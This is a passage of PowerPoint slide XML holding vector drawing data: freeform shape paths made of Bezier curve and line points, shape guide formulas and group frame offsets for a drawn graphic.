                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="172" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="66"/>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79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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1"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37"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5"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="172"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="163"/>
                      <a:pt x="118" y="159"/>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3"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="128" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="132"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="52"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>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Freeform 193"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="2614"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 1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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>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Freeform 194"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="261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Freeform 195"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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Freeform 196"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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Freeform 197"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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Freeform 198"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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Freeform 199"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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Freeform 200"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 201"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="3298"/>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Freeform 202"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="3298"/>
                <a:ext cx="77"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3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9"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="14"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>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Freeform 203"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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Freeform 204"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3395"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Freeform 205"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3590"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Freeform 206"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3788"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Freeform 207"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3938"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Freeform 208"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4085"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Freeform 209"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4284"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Freeform 210"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433" y="3292"/>
                <a:ext cx="82"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Freeform 211"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4581"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Freeform 212"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4779"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Freeform 213"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4926"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Freeform 214"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5125"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Freeform 215"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5261" y="3298"/>
                <a:ext cx="188" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 188"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 142 w 188"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 131 w 188"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 134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4 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 188"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 188"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 188"/>
                  <a:gd name="T37" fmla="*/ 84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4 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110 w 188"/>
                  <a:gd name="T65" fmla="*/ 134 h 218"/>
                  <a:gd name="T66" fmla="*/ 121 w 188"/>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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188"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Freeform 216"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5478"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0" name="Freeform 217"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5904" y="3292"/>
                <a:ext cx="82"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419"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="0"/>
              <a:ext cx="5890" cy="3541"/>
              <a:chOff x="1951" y="0"/>
              <a:chExt cx="5890" cy="3541"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1349" name="Freeform 219"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6051"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220"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="62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221"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="639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222"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6547"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223"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6744"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Freeform 224"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6893"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225"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7043"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Freeform 226"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7192"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227"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7340"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3"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228"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="753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229"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7686"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230"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5672" y="3284"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209 h 209"/>
                  <a:gd name="T4" fmla="*/ 81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2 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129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7 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 66 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
